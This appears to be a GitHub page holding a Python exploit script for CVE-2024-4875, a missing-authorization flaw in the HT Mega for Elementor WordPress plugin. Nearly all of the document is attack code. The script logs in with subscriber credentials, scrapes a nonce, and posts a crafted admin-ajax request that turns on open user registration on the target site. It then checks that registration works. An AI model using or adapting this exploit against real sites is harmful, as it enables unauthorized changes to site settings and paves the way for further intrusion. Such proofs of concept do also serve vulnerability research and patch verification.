-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-4875.py
137 lines (107 loc) · 5.29 KB
/
CVE-2024-4875.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
#!/usr/bin/env python3
import argparse
import requests
import re
from getpass import getpass
from bs4 import BeautifulSoup
import os
## Exploit script by @RandomRobbieBF
http_proxy = ""
os.environ['HTTP_PROXY'] = http_proxy
os.environ['HTTPS_PROXY'] = http_proxy
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
def check_plugin_version(url,username,password):
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}
plugin_url = ""+url+"/wp-content/plugins/ht-mega-for-elementor/readme.txt"
response = requests.get(plugin_url, headers=headers,verify=False,timeout=30)
if response.status_code == 200:
content = response.text
version_line = next((line for line in content.split('\n') if line.startswith('Stable tag:')), None)
if version_line:
version = version_line.split(':')[1].strip()
if version > '2.5.3':
print("The plugin version is 2.5.3 or above.")
exit()
else:
print("The plugin version is below 2.5.3.")
print("The plugin version is "+version+"")
return version
else:
print("Failed to find the version information in the readme.txt file.")
exit()
else:
print("Plugin not installed")
exit()
def vulncheck(url, username, password):
# Perform vulnerability check logic here
print("Vulnerability check:", url)
# Login to WordPress
login_url = f"{url}/wp-login.php"
session = requests.Session()
login_data = {
"log": username,
"pwd": password,
"wp-submit": "Log In",
"redirect_to": f"{url}/wp-admin/",
}
try:
login_response = session.post(login_url, data=login_data, headers={"User-Agent": user_agent})
login_response.raise_for_status()
# Extract the required cookies from the response headers
cookies = login_response.cookies
# Confirm successful login
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
print("Logged in successfully.")
try:
soup = BeautifulSoup(login_response.text, 'html.parser')
nonce_match = re.search(r"noticeNonce\s*=\s*'(\d+)';", login_response.text)
if nonce_match:
nonce_value = nonce_match.group(1)
print(nonce_value)
else:
print("Nonce value not found")
return False
except Exception as e:
print("Failed to extract nonce - "+str(e)+"")
exit()
else:
print("Failed to log in.")
exit()
payloads = [{"expiretime":"<expireTime>","action":"hastech_notices","closeby":"<closeBy>","alreadydid":"<alreadyDid>","noticeid":"users_can_register,","notice_nonce":nonce_value}]
main_url = f"{url}/wp-admin/admin-ajax.php"
for payload in payloads:
ajax_response = session.post(main_url,data=payload, headers={"User-Agent": user_agent,"X-Requested-With": "XMLHttpRequest"})
ajax_response.raise_for_status()
# Check if option set successfully
if ajax_response.status_code == 200:
print(f"Option set successfully: {main_url}")
else:
print(f"Failed to set option: {main_url}")
exit()
# Check if user registration is allowed
register_url = f"{url}/wp-login.php?action=register"
register_response = requests.get(register_url, headers={"User-Agent": user_agent})
if "Registration confirmation will be emailed to you" in register_response.text:
print("You can now register a user on the site you will need another exploit to gain further access.")
exit()
else:
print("boooo")
except requests.exceptions.RequestException as e:
print(f"Request failed with an error: {e}")
# Add the vulnerability description as a comment
DESCRIPTION = """
CVE-2024-4875 HT Mega – Absolute Addons For Elementor <= 2.5.2 - Missing Authorization to Options Update
Description:
The HT Mega – Absolute Addons For Elementor plugin for WordPress is vulnerable to unauthorized modification of data|loss of data due to a missing capability check on the 'ajax_dismiss' function in versions up to, and including, 2.5.2. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to update options such as users_can_register, which can lead to unauthorized user registration.
"""
# Use argparse to get the URL, username, and password arguments
parser = argparse.ArgumentParser(description=DESCRIPTION)
parser.add_argument("-u", "--url", help="Website URL", required=True)
parser.add_argument("-un", "--username", help="WordPress username")
parser.add_argument("-p", "--password", help="WordPress password")
args = parser.parse_args()
# Prompt for password if not provided as an argument
if not args.password:
args.password = getpass("Enter the WordPress password: ")
check_plugin_version(args.url, args.username,args.password)
vulncheck(args.url, args.username, args.password)